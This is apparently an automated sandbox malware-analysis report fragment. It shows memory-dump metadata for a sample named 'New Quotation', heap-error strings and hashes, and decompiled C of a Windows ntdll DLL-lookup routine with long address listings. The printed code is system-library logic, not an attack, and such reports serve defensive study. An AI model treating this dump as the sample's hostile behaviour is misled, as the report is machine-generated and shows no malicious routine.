                                                                                                                                                                                          0x1d880f4d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d880eeb
                                                                                                                                                                                          0x1d880eee
                                                                                                                                                                                          0x1d880f00
                                                                                                                                                                                          0x1d880ef0
                                                                                                                                                                                          0x1d880ef2
                                                                                                                                                                                          0x1d880ef7
                                                                                                                                                                                          0x1d880efa
                                                                                                                                                                                          0x1d880efa
                                                                                                                                                                                          0x1d880f04
                                                                                                                                                                                          0x1d880f07
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d880f09
                                                                                                                                                                                          0x1d880f1f
                                                                                                                                                                                          0x1d880f24
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d880f26
                                                                                                                                                                                          0x1d880f2d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d880f2f
                                                                                                                                                                                          0x1d880f32
                                                                                                                                                                                          0x1d880f35
                                                                                                                                                                                          0x1d880f35
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d880f35
                                                                                                                                                                                          0x1d880f0b
                                                                                                                                                                                          0x1d880f18
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d880f1a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d880f1a
                                                                                                                                                                                          0x1d881215
                                                                                                                                                                                          0x1d881215
                                                                                                                                                                                          0x1d88121e
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                                                                                          • API String ID: 0-3591852110
                                                                                                                                                                                          • Opcode ID: eb8c37ab10aff308a0718181d4b521ae02ee3b6de986e4db942d8e72aea94410
                                                                                                                                                                                          • Instruction ID: fce53774f543b0f975cfc1c48d0dd841d77157e2293667c99b52a4daab64ed82
                                                                                                                                                                                          • Opcode Fuzzy Hash: eb8c37ab10aff308a0718181d4b521ae02ee3b6de986e4db942d8e72aea94410
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8912BC34604686DFD716CF28C840BBABBF5FF09720F058559E48A8B692DB34E981DB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7EAC20 Relevance: 11.8, Strings: 9, Instructions: 509COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E1D7EAC20(signed int __ecx, signed char _a4, signed int _a8, intOrPtr _a16, signed char _a20) {
				signed int _v8;
				char _v276;
				void* _v280;
				void* _v284;
				void* _v304;
				void* _v308;
				void* _v312;
				void* _v324;
				short _v532;
				signed short* _v536;
				void* _v540;
				char _v544;
				void* _v548;
				void* _v576;
				signed int _v604;
				signed int _v608;
				signed int _v620;
				void* _v628;
				char _v632;
				char _v636;
				signed short _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed short _v656;
				signed short _v660;
				signed char _v664;
				signed char _v668;
				char _v669;
				void* _v672;
				signed int _v676;
				void* _v677;
				void* _v684;
				void* _v696;
				void* _v700;
				void* _v704;
				void* _v708;
				void* _v712;
				void* _v716;
				void* _v724;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t197;
				void* _t215;
				void* _t225;
				signed int _t250;
				char* _t255;
				signed char* _t258;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr* _t270;
				intOrPtr _t275;
				signed int _t276;
				intOrPtr _t283;
				intOrPtr _t295;
				signed short _t299;
				signed short _t300;
				intOrPtr _t307;
				signed char _t314;
				void* _t315;
				signed short* _t316;
				signed int _t317;
				signed int _t318;
				signed short _t340;
				signed short _t342;
				intOrPtr _t343;
				intOrPtr _t346;
				intOrPtr _t347;
				intOrPtr _t350;
				intOrPtr _t351;
				intOrPtr _t354;
				signed int _t356;
				signed int _t357;
				signed int _t362;
				void* _t363;
				signed char _t364;
				signed int _t366;
				unsigned int _t368;
				signed short* _t369;
				intOrPtr _t371;
				void* _t372;
				void* _t373;
				signed int _t374;
				signed int _t376;
				signed int _t378;
				signed int _t379;

				_t319 = __ecx;
				_t378 = (_t376 & 0xfffffff8) - 0x2a4;
				_v8 =  *0x1d8cb370 ^ _t378;
				_t371 = _a16;
				_v668 = _a20;
				if(( *0x1d8c37c0 & 0x00000009) != 0) {
					E1D84E692("minkernel\\ntdll\\ldrapi.c", 0x34c, "LdrGetDllHandleEx", 3, "DLL name: %wZ\n", _t371);
					_t378 = _t378 + 0x18;
				}
				_t362 =  *(_t371 + 4);
				E1D818F40( &_v620, 0, 0x50);
				_t197 = _a8;
				_t379 = _t378 + 0xc;
				if((_t197 & 0x00000001) == 0 && _t197 != 0) {
					_v620 = _t197;
					if(( *0x1d8c37c0 & 0x00000005) != 0) {
						E1D84E692("minkernel\\ntdll\\ldrutil.c", 0x5a5, "LdrpInitializeDllPath", 2, "DLL search path passed in externally: %ws\n", _t197);
						_t379 = _t379 + 0x18;
					}
					_t355 = _t362;
					E1D84FF03(_t362, _v620, 0x14c0);
				} else {
					_v604 = _t362;
					_v608 = _t197 & 0xfffffffe;
				}
				_t314 = _a4;
				if((_t314 & 0xfffffff8) != 0) {
					_t372 = 0xc000000d;
					L57:
					if(_v544 != 0) {
						E1D7FE7E0(_t319, _v620);
					}
					if(( *0x1d8c37c0 & 0x00000009) != 0) {
						E1D84E692("minkernel\\ntdll\\ldrapi.c", 0x37e, "LdrGetDllHandleEx", "true", "Status: 0x%08lx\n", _t372);
						_t379 = _t379 + 0x18;
					}
					_pop(_t363);
					_pop(_t373);
					_pop(_t315);
					return E1D814B50(_t372, _t315, _v8 ^ _t379, _t355, _t363, _t373);
				}
				if((_t314 & 0x00000003) == 3) {
					_t372 = 0xc000000d;
					goto L57;
				}
				_t364 = _v668;
				if(_t364 == 0) {
					if((_t314 & 0x00000002) != 0) {
						goto L7;
					}
					_t372 = 0xc000000d;
					goto L57;
				}
				L7:
				if(E1D7EC4A0(0,  &_v636) < 0) {
					_v669 = 0;
				} else {
					_v669 = 1;
				}
				_v664 = 0;
				_v536 =  &_v532;
				_t355 =  &_v540;
				_v676 = 0;
				_v532 = 0;
				_v540 = 0x1000000;
				_t372 = E1D7EB0D0(_t371,  &_v540, 0,  &_v664);
				if(_t372 < 0) {
					L38:
					_t211 = _v536;
					_t319 =  &_v532;
					if( &_v532 != _v536) {
						E1D7CBA80(_t211);
					}
					_v540 = 0x1000000;
					_v536 =  &_v532;
					_v532 = 0;
					if(_v669 != 0) {
						E1D7EC4A0(_v636,  &_v636);
					}
					if(_t372 < 0) {
						goto L57;
					} else {
						if((_t314 & 0x00000002) != 0) {
							_t215 = E1D807DF6(_v676);
							L115:
							_t372 = _t215;
							L44:
							if(_t372 >= 0 && _t364 != 0) {
								 *_t364 =  *((intOrPtr*)(_v676 + 0x18));
							}
							_t319 = _v676;
							E1D7ED3E1(_t314, _v676, _t372);
							goto L57;
						}
						if((_t314 & 0x00000001) == 0) {
							_t215 = E1D7EF602(_v676, _t355);
							goto L115;
						}
						goto L44;
					}
				} else {
					_t221 = _v664;
					if((_t221 & 0x00000020) == 0) {
						_t366 = _t221 & 0x00000200;
						if(_t366 == 0) {
							L69:
							_v276 = 0x1000000;
							 *((intOrPtr*)(_t379 + 0x1a4)) = _t379 + 0x1a8;
							 *((short*)(_t379 + 0x1a8)) = 0;
							_v648 = 0;
							_v644 = 0;
							if(_t366 == 0) {
								_t355 =  &_v620;
								_t225 = E1D7F2480( &_v540,  &_v620, 0, 0,  &_v276,  &_v632,  &_v648, 0, 0);
							} else {
								_t355 =  &_v276;
								_t225 = E1D7F1F5E( &_v540,  &_v276,  &_v632,  &_v648, _t221);
							}
							_t372 = _t225;
							if(_t372 >= 0) {
								_t355 =  &_v648;
								_t372 = E1D7EF380( &_v632,  &_v648, _v664,  &_v676,  &_v660);
								if(_t372 == 0xc0000135) {
									_t355 =  &_v676;
									_t372 = E1D805751( &_v276,  &_v676,  &_v660);
								}
							}
							E1D7FE3C9( &_v648);
							_t227 =  *((intOrPtr*)(_t379 + 0x1a4));
							if(_t379 + 0x1a8 !=  *((intOrPtr*)(_t379 + 0x1a4))) {
								E1D7CBA80(_t227);
							}
							_v276 = 0x1000000;
							 *((intOrPtr*)(_t379 + 0x1a4)) = _t379 + 0x1a8;
							 *((short*)(_t379 + 0x1a8)) = 0;
							L34:
							if(( *0x1d8c37c0 & 0x00000009) != 0) {
								E1D84E692("minkernel\\ntdll\\ldrfind.c", 0x1e0, "LdrpFindLoadedDllInternal", "true", "Status: 0x%08lx\n", _t372);
								_t379 = _t379 + 0x18;
							}
							if(_t372 >= 0 && _v660 < 6 && ( *( *[fs:0x18] + 0xfca) & 0x00001000) == 0) {
								E1D7ED3E1(_t314, _v676, _t372);
								_v676 = 0;
								E1D7F19DF(0);
								_t355 =  &_v620;
								_t372 = E1D809E13( &_v540,  &_v620,  &_v676,  &_v660, _v664);
								E1D8079F9();
								if(_t372 >= 0 && _v652 != 9) {
									E1D7ED3E1(_t314, _v668, _t372);
									_v668 = 0;
									_t372 = 0xc0000135;
								}
							}
							_t364 = _v668;
							goto L38;
						}
						_t355 =  &_v540;
						_t372 = E1D7EF380(0,  &_v540, _t221,  &_v676,  &_v660);
						if(_t372 >= 0) {
							goto L34;
						}
						_t221 = _v664;
						goto L69;
					}
					_t374 = 0;
					_t368 = (_v540 & 0x0000ffff) >> 1;
					_t316 = _v536;
					if(_t368 == 0) {
						L16:
						if(_t374 == 0) {
							_t374 = 0x80000000;
						}
						L1D7E2330(_t221, 0x1d8c6668);
						_t250 = _t374 & 0x0000001f;
						_t340 =  *(0x1d8c5b80 + _t250 * 8);
						_t355 = 0x1d8c5b80 + _t250 * 8;
						_v656 = _t355;
						_v660 = _t340;
						if(_t340 == _t355) {
							L61:
							_t372 = 0xc0000135;
							goto L30;
						} else {
							_t267 = _t355;
							do {
								_t355 = _t340 - 0x3c;
								_v648 = _t355;
								if(_t374 !=  *((intOrPtr*)(_t355 + 0x90))) {
									goto L60;
								}
								if((_v664 & 0x00000008) != 0) {
									if(( *(_t355 + 0x34) & 0x00000001) == 0) {
										goto L60;
									}
								}
								if(( *(_t355 + 0x34) & 0x10000000) != 0) {
									goto L60;
								}
								_t317 = _v540 & 0x0000ffff;
								if(_t317 != ( *(_t355 + 0x2c) & 0x0000ffff)) {
									L98:
									_t267 = _v652;
									goto L60;
								}
								_t369 = _v536;
								_t269 = _t369 + _t317;
								_v632 = _t269;
								if(_t369 >= _t269) {
									L28:
									_t270 =  *((intOrPtr*)(_t355 + 0x50));
									if( *((intOrPtr*)(_t270 + 0xc)) != 0xffffffff) {
										if(( *( *_t270 - 0x20) & 0x00000020) == 0) {
											asm("lock inc dword [edx+0x9c]");
										}
									}
									_t372 = 0;
									_v676 = _t355;
									_v660 =  *( *((intOrPtr*)(_t355 + 0x50)) + 0x20);
									L30:
									E1D7E24D0(0x1d8c6668);
									if(E1D7E3C40() != 0) {
										_t255 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
									} else {
										_t255 = 0x7ffe0384;
									}
									if( *_t255 != 0) {
										if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
											if(E1D7E3C40() == 0) {
												_t258 = 0x7ffe0385;
											} else {
												_t258 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
											}
											if(( *_t258 & 0x00000020) != 0) {
												_t355 = 0;
												E1D850227(0x14a0, 0, 0, ( &_v540 & 0xffffff00 | _t372 > 0x00000000) - 0x00000001 & 3,  &_v540, 0);
											}
										}
									}
									_t314 = _a4;
									goto L34;
								} else {
									_t275 =  *((intOrPtr*)(_t355 + 0x30)) - _t369;
									 *((intOrPtr*)(_t379 + 0x44)) = _t275;
									do {
										_t342 =  *(_t275 + _t369) & 0x0000ffff;
										_t318 =  *_t369 & 0x0000ffff;
										_v640 = _t342;
										if(_t318 != _t342) {
											if(_t318 < 0x61) {
												L52:
												if(_t342 >= 0x61) {
													if(_t342 > 0x7a) {
														if( *0x1d8c6914 == 0 || _t342 < 0xc0) {
															goto L53;
														} else {
															_t356 = _t342 & 0x0000ffff;
															_t343 =  *0x1d8c6914; // 0x7ffd0654
															_t355 = _t356 & 0x0000000f;
															_t283 =  *0x1d8c6914; // 0x7ffd0654
															_t346 =  *0x1d8c6914; // 0x7ffd0654
															_t276 =  *((intOrPtr*)(_t346 + (( *(_t283 + (( *(_t343 + (_t356 >> 8) * 2) & 0x0000ffff) + (_t356 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t356 & 0x0000000f)) * 2)) + _v640 & 0x0000ffff;
															L54:
															if(_t318 != _t276) {
																_t340 = _v656;
																goto L98;
															}
															_t275 =  *((intOrPtr*)(_t379 + 0x44));
															goto L26;
														}
													}
													_t276 = _t342 - 0x00000020 & 0x0000ffff;
													goto L54;
												}
												L53:
												_t276 = _t342 & 0x0000ffff;
												goto L54;
											}
											if(_t318 > 0x7a) {
												if( *0x1d8c6914 != 0 && _t318 >= 0xc0) {
													_t347 =  *0x1d8c6914; // 0x7ffd0654
													_t357 = _t318;
													_t355 = _t357 & 0x0000000f;
													_t295 =  *0x1d8c6914; // 0x7ffd0654
													_t350 =  *0x1d8c6914; // 0x7ffd0654
													_t342 = _v640;
													_t299 =  *((intOrPtr*)(_t350 + (( *(_t295 + (( *(_t347 + (_t318 >> 8) * 2) & 0x0000ffff) + (_t357 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t357 & 0x0000000f)) * 2)) + _t318;
													L51:
													_t318 = _t299 & 0x0000ffff;
												}
												goto L52;
											}
											_t88 = _t318 - 0x20; // 0xffffe0
											_t299 = _t88;
											goto L51;
										}
										L26:
										_t369 =  &(_t369[1]);
									} while (_t369 < _v632);
									_t355 = _v648;
									goto L28;
								}
								L60:
								_t340 =  *_t340;
								_v656 = _t340;
							} while (_t340 != _t267);
							goto L61;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t300 =  *_t316 & 0x0000ffff;
						_t316 =  &(_t316[1]);
						_t368 = _t368 - 1;
						_v656 = _t300;
						if(_t300 >= 0x61) {
							if(_t300 > 0x7a) {
								_t351 =  *0x1d8c6914; // 0x7ffd0654
								if(_t351 != 0 && _t300 >= 0xc0) {
									_t359 = _t300 & 0x0000ffff;
									_t307 =  *0x1d8c6914; // 0x7ffd0654
									_t354 =  *0x1d8c6914; // 0x7ffd0654
									_t300 =  *((intOrPtr*)(_t354 + (( *(_t307 + (( *(_t351 + ((_t300 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + ((_t300 & 0x0000ffff) >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t359 & 0x0000000f)) * 2)) + _v656;
								}
							} else {
								_t300 = _t300 + 0xffffffe0;
							}
						}
						_t221 = _t300 & 0xffff;
						_t374 = _t374 * 0x1003f + (_t300 & 0xffff);
					} while (_t368 != 0);
					goto L16;
				}
			}



























































































                                                                                                                                                                                          0x1d7eac20
                                                                                                                                                                                          0x1d7eac28
                                                                                                                                                                                          0x1d7eac35
                                                                                                                                                                                          0x1d7eac48
                                                                                                                                                                                          0x1d7eac4c
                                                                                                                                                                                          0x1d7eac50
                                                                                                                                                                                          0x1d837e98
                                                                                                                                                                                          0x1d837e9d
                                                                                                                                                                                          0x1d837e9d
                                                                                                                                                                                          0x1d7eac56
                                                                                                                                                                                          0x1d7eac62
                                                                                                                                                                                          0x1d7eac67
                                                                                                                                                                                          0x1d7eac6a
                                                                                                                                                                                          0x1d7eac6f
                                                                                                                                                                                          0x1d837eac
                                                                                                                                                                                          0x1d837eb0
                                                                                                                                                                                          0x1d837ec9
                                                                                                                                                                                          0x1d837ece
                                                                                                                                                                                          0x1d837ece
                                                                                                                                                                                          0x1d837eda
                                                                                                                                                                                          0x1d837edc
                                                                                                                                                                                          0x1d7eac79
                                                                                                                                                                                          0x1d7eac7c
                                                                                                                                                                                          0x1d7eac80
                                                                                                                                                                                          0x1d7eac80
                                                                                                                                                                                          0x1d7eac84
                                                                                                                                                                                          0x1d7eac8d
                                                                                                                                                                                          0x1d837ee6
                                                                                                                                                                                          0x1d7eaf39
                                                                                                                                                                                          0x1d7eaf41
                                                                                                                                                                                          0x1d8381ad
                                                                                                                                                                                          0x1d8381ad
                                                                                                                                                                                          0x1d7eaf4e
                                                                                                                                                                                          0x1d8381ce
                                                                                                                                                                                          0x1d8381d3
                                                                                                                                                                                          0x1d8381d3
                                                                                                                                                                                          0x1d7eaf5d
                                                                                                                                                                                          0x1d7eaf5e
                                                                                                                                                                                          0x1d7eaf5f
                                                                                                                                                                                          0x1d7eaf6a
                                                                                                                                                                                          0x1d7eaf6a
                                                                                                                                                                                          0x1d7eac9a
                                                                                                                                                                                          0x1d7eaf34
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7eaf34
                                                                                                                                                                                          0x1d7eaca0
                                                                                                                                                                                          0x1d7eaca6
                                                                                                                                                                                          0x1d837ef3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d837ef9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d837ef9
                                                                                                                                                                                          0x1d7eacac
                                                                                                                                                                                          0x1d7eacba
                                                                                                                                                                                          0x1d837f03
                                                                                                                                                                                          0x1d7eacc0
                                                                                                                                                                                          0x1d7eacc0
                                                                                                                                                                                          0x1d7eacc0
                                                                                                                                                                                          0x1d7eaccc
                                                                                                                                                                                          0x1d7eacd4
                                                                                                                                                                                          0x1d7eacdb
                                                                                                                                                                                          0x1d7eace4
                                                                                                                                                                                          0x1d7eacec
                                                                                                                                                                                          0x1d7eacfa
                                                                                                                                                                                          0x1d7ead0d
                                                                                                                                                                                          0x1d7ead11
                                                                                                                                                                                          0x1d7eae86
                                                                                                                                                                                          0x1d7eae86
                                                                                                                                                                                          0x1d7eae8d
                                                                                                                                                                                          0x1d7eae96
                                                                                                                                                                                          0x1d838184
                                                                                                                                                                                          0x1d838184
                                                                                                                                                                                          0x1d7eaea3
                                                                                                                                                                                          0x1d7eaeae
                                                                                                                                                                                          0x1d7eaeb7
                                                                                                                                                                                          0x1d7eaec3
                                                                                                                                                                                          0x1d7eaece
                                                                                                                                                                                          0x1d7eaece
                                                                                                                                                                                          0x1d7eaed5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7eaed7
                                                                                                                                                                                          0x1d7eaeda
                                                                                                                                                                                          0x1d838192
                                                                                                                                                                                          0x1d8381a2
                                                                                                                                                                                          0x1d8381a2
                                                                                                                                                                                          0x1d7eaee9
                                                                                                                                                                                          0x1d7eaeeb
                                                                                                                                                                                          0x1d7eaef8
                                                                                                                                                                                          0x1d7eaef8
                                                                                                                                                                                          0x1d7eaefa
                                                                                                                                                                                          0x1d7eaefe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7eaefe
                                                                                                                                                                                          0x1d7eaee3
                                                                                                                                                                                          0x1d83819d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83819d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7eaee3
                                                                                                                                                                                          0x1d7ead17
                                                                                                                                                                                          0x1d7ead17
                                                                                                                                                                                          0x1d7ead1d
                                                                                                                                                                                          0x1d7eafb4
                                                                                                                                                                                          0x1d7eafba
                                                                                                                                                                                          0x1d7eafe3
                                                                                                                                                                                          0x1d7eafea
                                                                                                                                                                                          0x1d7eaff5
                                                                                                                                                                                          0x1d7eaffe
                                                                                                                                                                                          0x1d7eb006
                                                                                                                                                                                          0x1d7eb00a
                                                                                                                                                                                          0x1d7eb017
                                                                                                                                                                                          0x1d8380ce
                                                                                                                                                                                          0x1d8380d2
                                                                                                                                                                                          0x1d7eb01d
                                                                                                                                                                                          0x1d7eb028
                                                                                                                                                                                          0x1d7eb02f
                                                                                                                                                                                          0x1d7eb02f
                                                                                                                                                                                          0x1d7eb034
                                                                                                                                                                                          0x1d7eb038
                                                                                                                                                                                          0x1d7eb048
                                                                                                                                                                                          0x1d7eb055
                                                                                                                                                                                          0x1d7eb05d
                                                                                                                                                                                          0x1d7eb064
                                                                                                                                                                                          0x1d7eb074
                                                                                                                                                                                          0x1d7eb074
                                                                                                                                                                                          0x1d7eb05d
                                                                                                                                                                                          0x1d7eb07a
                                                                                                                                                                                          0x1d7eb07f
                                                                                                                                                                                          0x1d7eb08f
                                                                                                                                                                                          0x1d7eb0ba
                                                                                                                                                                                          0x1d7eb0ba
                                                                                                                                                                                          0x1d7eb098
                                                                                                                                                                                          0x1d7eb0a3
                                                                                                                                                                                          0x1d7eb0ac
                                                                                                                                                                                          0x1d7eae66
                                                                                                                                                                                          0x1d7eae6d
                                                                                                                                                                                          0x1d8380f3
                                                                                                                                                                                          0x1d8380f8
                                                                                                                                                                                          0x1d8380f8
                                                                                                                                                                                          0x1d7eae75
                                                                                                                                                                                          0x1d83811c
                                                                                                                                                                                          0x1d838123
                                                                                                                                                                                          0x1d83812b
                                                                                                                                                                                          0x1d83813e
                                                                                                                                                                                          0x1d83814e
                                                                                                                                                                                          0x1d838150
                                                                                                                                                                                          0x1d838157
                                                                                                                                                                                          0x1d83816c
                                                                                                                                                                                          0x1d838171
                                                                                                                                                                                          0x1d838179
                                                                                                                                                                                          0x1d838179
                                                                                                                                                                                          0x1d838157
                                                                                                                                                                                          0x1d7eae82
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7eae82
                                                                                                                                                                                          0x1d7eafc7
                                                                                                                                                                                          0x1d7eafd5
                                                                                                                                                                                          0x1d7eafd9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7eafdf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7eafdf
                                                                                                                                                                                          0x1d7ead2b
                                                                                                                                                                                          0x1d7ead2d
                                                                                                                                                                                          0x1d7ead2f
                                                                                                                                                                                          0x1d7ead36
                                                                                                                                                                                          0x1d7ead66
                                                                                                                                                                                          0x1d7ead68
                                                                                                                                                                                          0x1d837f61
                                                                                                                                                                                          0x1d837f61
                                                                                                                                                                                          0x1d7ead73
                                                                                                                                                                                          0x1d7ead7a
                                                                                                                                                                                          0x1d7ead7d
                                                                                                                                                                                          0x1d7ead84
                                                                                                                                                                                          0x1d7ead8b
                                                                                                                                                                                          0x1d7ead8f
                                                                                                                                                                                          0x1d7ead95
                                                                                                                                                                                          0x1d7eaf7b
                                                                                                                                                                                          0x1d7eaf7b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ead9b
                                                                                                                                                                                          0x1d7ead9b
                                                                                                                                                                                          0x1d7eada0
                                                                                                                                                                                          0x1d7eada0
                                                                                                                                                                                          0x1d7eada3
                                                                                                                                                                                          0x1d7eadad
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7eadb8
                                                                                                                                                                                          0x1d837f6f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d837f75
                                                                                                                                                                                          0x1d7eadc5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7eadcb
                                                                                                                                                                                          0x1d7eadd9
                                                                                                                                                                                          0x1d838034
                                                                                                                                                                                          0x1d838034
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d838034
                                                                                                                                                                                          0x1d7eaddf
                                                                                                                                                                                          0x1d7eade6
                                                                                                                                                                                          0x1d7eade9
                                                                                                                                                                                          0x1d7eadef
                                                                                                                                                                                          0x1d7eae21
                                                                                                                                                                                          0x1d7eae21
                                                                                                                                                                                          0x1d7eae28
                                                                                                                                                                                          0x1d7eaf8b
                                                                                                                                                                                          0x1d7eaf91
                                                                                                                                                                                          0x1d7eaf91
                                                                                                                                                                                          0x1d7eaf8b
                                                                                                                                                                                          0x1d7eae31
                                                                                                                                                                                          0x1d7eae33
                                                                                                                                                                                          0x1d7eae3a
                                                                                                                                                                                          0x1d7eae3e
                                                                                                                                                                                          0x1d7eae43
                                                                                                                                                                                          0x1d7eae4f
                                                                                                                                                                                          0x1d838046
                                                                                                                                                                                          0x1d7eae55
                                                                                                                                                                                          0x1d7eae55
                                                                                                                                                                                          0x1d7eae55
                                                                                                                                                                                          0x1d7eae5d
                                                                                                                                                                                          0x1d83805d
                                                                                                                                                                                          0x1d83806a
                                                                                                                                                                                          0x1d83807c
                                                                                                                                                                                          0x1d83806c
                                                                                                                                                                                          0x1d838075
                                                                                                                                                                                          0x1d838075
                                                                                                                                                                                          0x1d838084
                                                                                                                                                                                          0x1d8380a0
                                                                                                                                                                                          0x1d8380aa
                                                                                                                                                                                          0x1d8380aa
                                                                                                                                                                                          0x1d838084
                                                                                                                                                                                          0x1d83805d
                                                                                                                                                                                          0x1d7eae63
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7eadf1
                                                                                                                                                                                          0x1d7eadf4
                                                                                                                                                                                          0x1d7eadf6
                                                                                                                                                                                          0x1d7eae00
                                                                                                                                                                                          0x1d7eae00
                                                                                                                                                                                          0x1d7eae04
                                                                                                                                                                                          0x1d7eae07
                                                                                                                                                                                          0x1d7eae0e
                                                                                                                                                                                          0x1d7eaf08
                                                                                                                                                                                          0x1d7eaf19
                                                                                                                                                                                          0x1d7eaf1d
                                                                                                                                                                                          0x1d7eafa1
                                                                                                                                                                                          0x1d837fdb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d837fef
                                                                                                                                                                                          0x1d837fef
                                                                                                                                                                                          0x1d837ff2
                                                                                                                                                                                          0x1d838006
                                                                                                                                                                                          0x1d83800e
                                                                                                                                                                                          0x1d838017
                                                                                                                                                                                          0x1d838028
                                                                                                                                                                                          0x1d7eaf22
                                                                                                                                                                                          0x1d7eaf25
                                                                                                                                                                                          0x1d838030
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d838030
                                                                                                                                                                                          0x1d7eaf2b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7eaf2b
                                                                                                                                                                                          0x1d837fdb
                                                                                                                                                                                          0x1d7eafaa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7eafaa
                                                                                                                                                                                          0x1d7eaf1f
                                                                                                                                                                                          0x1d7eaf1f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7eaf1f
                                                                                                                                                                                          0x1d7eaf0d
                                                                                                                                                                                          0x1d837f81
                                                                                                                                                                                          0x1d837f95
                                                                                                                                                                                          0x1d837f9b
                                                                                                                                                                                          0x1d837fab
                                                                                                                                                                                          0x1d837fb3
                                                                                                                                                                                          0x1d837fbc
                                                                                                                                                                                          0x1d837fc8
                                                                                                                                                                                          0x1d837fcc
                                                                                                                                                                                          0x1d7eaf16
                                                                                                                                                                                          0x1d7eaf16
                                                                                                                                                                                          0x1d7eaf16
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d837f81
                                                                                                                                                                                          0x1d7eaf13
                                                                                                                                                                                          0x1d7eaf13
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7eaf13
                                                                                                                                                                                          0x1d7eae14
                                                                                                                                                                                          0x1d7eae14
                                                                                                                                                                                          0x1d7eae17
                                                                                                                                                                                          0x1d7eae1d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7eae1d
                                                                                                                                                                                          0x1d7eaf6d
                                                                                                                                                                                          0x1d7eaf6d
                                                                                                                                                                                          0x1d7eaf6f
                                                                                                                                                                                          0x1d7eaf73
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7eada0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ead38
                                                                                                                                                                                          0x1d7ead38
                                                                                                                                                                                          0x1d7ead38
                                                                                                                                                                                          0x1d7ead3b
                                                                                                                                                                                          0x1d7ead3e
                                                                                                                                                                                          0x1d7ead3f
                                                                                                                                                                                          0x1d7ead46
                                                                                                                                                                                          0x1d7ead4b
                                                                                                                                                                                          0x1d837f0d
                                                                                                                                                                                          0x1d837f15
                                                                                                                                                                                          0x1d837f29
                                                                                                                                                                                          0x1d837f42
                                                                                                                                                                                          0x1d837f4b
                                                                                                                                                                                          0x1d837f57
                                                                                                                                                                                          0x1d837f57
                                                                                                                                                                                          0x1d7ead51
